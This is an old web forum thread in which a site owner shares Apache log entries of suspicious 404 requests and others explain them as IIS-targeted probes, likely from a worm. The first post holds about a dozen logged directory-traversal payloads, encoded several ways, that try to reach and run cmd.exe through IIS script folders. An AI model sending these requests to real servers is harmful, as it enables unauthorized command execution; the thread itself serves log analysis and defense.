Results 1 to 4 of 4

Thread: Malicious?

  1. #1
    Senior Member
    Join Date
    Oct 2001
    Posts
    689

    Post Malicious?

    Im not a pro at apache yet, so when I saw a lot of 404 errors near each other with a very distinctive pattern, I became suspicious. I copied part of the log so you could see and tell me if someone was trying some crap with me. I omitted the ip in case I'm wrong. All this was from a single ip and it appears as though someone was under the impression I used NT. The fact that they were trying to access the scripts folder leads me to believe they had malicious intentions.

    - - [31/May/2002:03:19:45 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
    - - [31/May/2002:03:19:47 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
    - - [31/May/2002:03:19:48 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
    - - [31/May/2002:03:19:48 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 "-" "-"
    - - [31/May/2002:03:19:48 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 317 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
    - - [31/May/2002:03:19:49 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
    Wine maketh merry: but money answereth all things.
    --Ecclesiastes 10:19

  2. #2
    Junior Member
    Join Date
    Nov 2001
    Posts
    3
    Just somthing you're not vulnerable for.
    This is nothing really harmfull for you, since you don't have a NT server.
    It is only like a small DOS attack, as long as it doesn't change to a DDOS your server should be fine.

  3. #3
    Senior Member
    Join Date
    Oct 2001
    Location
    Helsinki, Finland
    Posts
    570
    Well if you were running the Linux version it seems to me that you're safe.
    Cheops, it doesn't really look like a DOS attack, they were trying to get to the command prompt... (DOS is for 'Denial Of Service' but also for 'Diskette Operating System'... We were discussing about the first one, weren't we?)
    Q: Why do computer scientists confuse Christmas and Halloween?
    A: Because Oct 31 = Dec 25

  4. #4
    Senior Member
    Join Date
    Jan 2002
    Posts
    218
    just a very lame exploit only good on iis servers man. your *nix box has nothing to fear from that script kiddie. could have been another iis server infected with a worm. everyone on your subnet probably received it too. happens quit often. i had to email a webmaster one time because his iis server was infected with a worm and was scanning the entire subnet for other iis servers. it was ignorable until it continued to probe my machine over and over and started to lag my unreal tournament gaming! that was unacceptable, so i took care of the problem. if you continue to get, do a little investigating on the users ip and see if you see any traces of what appears to be a worm or anything unusual. check to see if they are running a webserver (point your web browser to their ip at port 80, or 8080) and have any contact info to advise them to check their machine. if you can not get ahold of them, contact your isp because as i said, if it is a worm, you will not be the only one, and i am sure they will try and take care of it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •